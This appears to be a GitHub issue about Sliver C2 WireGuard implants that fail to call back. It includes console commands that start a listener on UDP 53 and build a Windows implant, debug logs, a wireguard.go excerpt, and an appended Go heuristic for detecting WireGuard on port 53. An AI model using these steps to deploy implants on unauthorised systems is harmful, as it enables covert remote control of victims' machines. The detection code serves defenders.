Description
Over the past few days of testing, I've tried running the sliver-server on several different VPSs. Following the documentation and using the steps below, I generated the implants. I then ran them on multiple Windows x64 systems across various network environments, but the callback has failed in every single case. I'm not sure what the problem is.
```
sliver > wg
[] Starting Wireguard listener ...
[] Successfully started job #1
sliver > jobs
 ID   Name   Protocol   Port   Stage Profile
==== ====== ========== ====== ===============
 1    wg     udp        53
sliver > generate --wg x.x.x.x --arch amd64 --os windows
[] Generated unique ip for wg peer tun interface: 100.64.0.2
[] Generating new windows/amd64 implant binary
[] Build completed in 17s
[] Implant saved to /root/UNPLEASANT_CREST.exe
```
I ran UNPLEASANT_CREST.exe on a bunch of Win x64 machines in different networks, but they just won't call back.
So, I checked the firewall and confirmed that UDP port 53 was not blocked. To investigate the cause, I generated the implants with the --debug parameter to enable debug output.
I found that after execution, each implant gets stuck in a repetitive key exchange loop, ultimately failing with the following messages:
```
2025/11/21 22:17:14 wireguard.go:184: Unable to connect to wg key exchange listener: connect tcp 100.64.0.1:1337: operation timed out
2025/11/21 22:17:14 sliver.go:158: [session] failed to establish connection: [wireguard] Cannot connect to empty IP address
```
I run them on several different Windows x64 systems across various network environments, and I get the same result every time.
So, following the error message "100.64.0.1:1337: operation timed out", I checked the VPSs and confirmed that none of them are listening on port 1337. What could be the reason for this? When using WireGuard implants with Sliver, is the server supposed to listen on port 1337 under normal circumstances? I've started reading the wireguard.go source code...
```go
	// Open up key exchange TCP socket
	keyExchangeListener, err := tNet.ListenTCP(&net.TCPAddr{IP: net.ParseIP(tunIP), Port: int(keyExchangeListenPort)}) //!!!!!
	if err != nil {
		wgLog.Errorf("Failed to setup up wg key exchange listener: %v", err)
		return nil, nil, nil, err
	}
	wgLog.Printf("Successfully setup up wg key exchange listener")
	go acceptKeyExchangeConnection(keyExchangeListener)
	// Open up c2 commincation listener TCP socket
	listener, err := tNet.ListenTCP(&net.TCPAddr{IP: net.ParseIP(tunIP), Port: int(netstackPort)})
	if err != nil {
		wgLog.Errorf("Failed to setup up wg sliver listener: %v", err)
		return nil, nil, nil, err
	}
	wgLog.Printf("Successfully setup up wg sliver listener")
	go acceptWGSliverConnections(listener)
	return listener, dev, wgConf, nil
```
I've discovered that, with `tNet.ListenTCP(&net.TCPAddr{IP: net.ParseIP(tunIP), Port: int(keyExchangeListenPort)})`, the key exchange process does indeed create a TCP socket and listen on a port (1337 by default). However, despite repeated attempts, even when using wg -x 1337, I can't get it to work. Am I missing a critical operational step? When I use other implants like mTLS, they call back successfully.
I've been struggling with this situation for several days now. I would be grateful if an expert could guide me.
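
From a detection standpoint, the `wg` job on UDP 53 in the listing above means that port carries WireGuard rather than DNS. The following is an added example, not part of the original issue or of Sliver's code: a heuristic Go classifier for UDP/53 payloads based on WireGuard's fixed message header and sizes. The function names and the constructed sample payloads are assumptions made for illustration.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// Fixed WireGuard message sizes in bytes, per message type.
const (
	wgInitLen     = 148 // type 1: handshake initiation
	wgResponseLen = 92  // type 2: handshake response
	wgCookieLen   = 64  // type 3: cookie reply
	wgDataMinLen  = 32  // type 4: 16-byte header + 16-byte tag (keepalive)
)

// looksLikeDNS is a loose sanity check: full header, opcode QUERY, one question.
func looksLikeDNS(p []byte) bool {
	if len(p) < 12 {
		return false
	}
	opcode := (binary.BigEndian.Uint16(p[2:4]) >> 11) & 0xF
	return opcode == 0 && binary.BigEndian.Uint16(p[4:6]) == 1
}

// ClassifyUDP53 labels one UDP payload observed on port 53 (hypothetical helper).
func ClassifyUDP53(p []byte) string {
	// WireGuard messages start with a type byte followed by three zero bytes.
	wg := len(p) >= 4 && p[1] == 0 && p[2] == 0 && p[3] == 0
	switch {
	case wg && p[0] == 1 && len(p) == wgInitLen:
		return "wireguard-handshake-initiation"
	case wg && p[0] == 2 && len(p) == wgResponseLen:
		return "wireguard-handshake-response"
	case wg && p[0] == 3 && len(p) == wgCookieLen:
		return "wireguard-cookie-reply"
	case looksLikeDNS(p):
		return "dns"
	case wg && p[0] == 4 && len(p) >= wgDataMinLen && len(p)%16 == 0:
		return "wireguard-transport-data"
	}
	return "unknown"
}

func main() {
	// Constructed samples: a zero-filled 148-byte initiation and a DNS query header.
	initiation := make([]byte, wgInitLen)
	initiation[0] = 1
	query := []byte{0x12, 0x34, 0x01, 0x00, 0, 1, 0, 0, 0, 0, 0, 0}
	fmt.Println(ClassifyUDP53(initiation), ClassifyUDP53(query))
}
```

The match is a heuristic on header bytes and lengths only, so treat a hit as a lead to correlate with flow data rather than as proof.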